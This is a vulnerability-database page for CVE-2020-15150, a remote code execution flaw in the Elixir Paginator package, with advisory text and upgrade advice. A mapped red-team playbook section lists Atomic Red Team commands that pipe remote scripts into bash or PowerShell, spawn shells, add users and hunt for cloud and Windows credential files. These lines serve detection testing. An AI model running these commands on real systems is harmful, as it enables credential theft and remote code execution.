CVE-2020-15150
Overview
The vulnerability is a remote code execution (RCE) flaw caused by unsafe handling of input parameters within the paginate() function of the Paginator Elixir package. Specifically, the root cause is improper sanitization or validation of user-supplied input that is subsequently evaluated or executed, leading to code injection. This affects the core pagination component responsible for generating paginated query results in versions prior to 1.0.0.
Vulnerability Description
There is a vulnerability in Paginator (Elixir/Hex package) which makes it susceptible to Remote Code Execution (RCE) attacks via input parameters to the paginate() function. This will potentially affect all current users of Paginator prior to version 1.0.0. The vulnerability has been patched in version 1.0.0 and all users should upgrade to this version immediately. Note that this patched version uses a dependency that requires an Elixir version >=1.5.
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network to execute arbitrary code within the context of the application using the paginate() function. No user interaction or privileges are required (CVSS vector AV:N/AC:H/PR:N/UI:N). Exploitation can lead to full system compromise, data theft, or service disruption for all users running affected versions of the Paginator package prior to 1.0.0.
Solution
Users of the Paginator Elixir package should upgrade immediately to version 1.0.0 or later, which includes the fix for this vulnerability as detailed in the GitHub advisory GHSA-w98m-2xqg-9cvj. The update requires Elixir version 1.5 or higher due to dependency changes. Refer to https://github.com/duffelhq/paginator/security/advisories/GHSA-w98m-2xqg-9cvj for full patch instructions and commit details.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Paginator package, a widely used Elixir/Hex library, stems from improper handling of input parameters in the paginate() function. This flaw allows an attacker to craft malicious input that can lead to Remote Code Execution (RCE). The core issue lies in the way the package processes user-supplied data without adequate validation or sanitization, enabling the execution of arbitrary code on the server. This vulnerability is particularly critical given the high CVSS score of 9.8, indicating a severe risk to systems utilizing this package prior to version 1.0.0.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could send specially crafted requests to an application using the Paginator package, manipulating the parameters passed to the paginate() function. For instance, if an application exposes pagination functionality to end-users, an attacker could exploit this by injecting malicious code into the input fields. Once the server processes this input, it could execute the attacker's code, potentially leading to unauthorized access, data exfiltration, or complete system compromise. The ease of exploitation combined with the potential for significant impact makes this vulnerability particularly dangerous.
The real-world implications of this vulnerability are substantial. Organizations relying on the Paginator package for their applications may face severe operational disruptions if exploited. The risk extends beyond immediate technical issues; it encompasses reputational damage, loss of customer trust, and potential legal ramifications stemming from data breaches. Furthermore, the financial impact could be considerable, with costs associated with incident response, system recovery, and potential regulatory fines. Businesses must recognize that the consequences of a successful RCE attack can be far-reaching, affecting not only their internal operations but also their standing in the marketplace.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched version of the Paginator package, which addresses the flaw and requires an Elixir version of 1.5 or higher. Regularly reviewing and updating dependencies is a fundamental practice in maintaining application security. Additionally, implementing robust input validation and sanitization measures can help prevent similar vulnerabilities from being exploited in the future. Organizations should also consider employing security tools that can analyze code for vulnerabilities, conduct regular security audits, and engage in penetration testing to identify weaknesses before they can be exploited by malicious actors.
In conclusion, the vulnerability in the Paginator package presents a critical threat that necessitates immediate action from affected users. The potential for Remote Code Execution poses a significant risk to the integrity and security of applications leveraging this library. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability. Upgrading to the latest version and adopting a proactive security posture are essential steps in safeguarding against future threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Duffel | Paginator | All |
cpe:2.3:a:duffel:paginator:*:*:*:*:*:elixir:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-15150 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/duffelhq/paginator/security/advisories/GHSA-w98m-2xqg-9cvj |
| hex.pm |
GitHub CVE
x_refsource_CONFIRM
|
https://hex.pm/packages/paginator |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/duffelhq/paginator/commit/bf45e92602e517c75aea0465efc35cd661d9ebf8 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/duffelhq/paginator/blob/ccf0f37fa96347cc8c8a7e9eb2c64462cec4b2dc/README.md#security-considerations |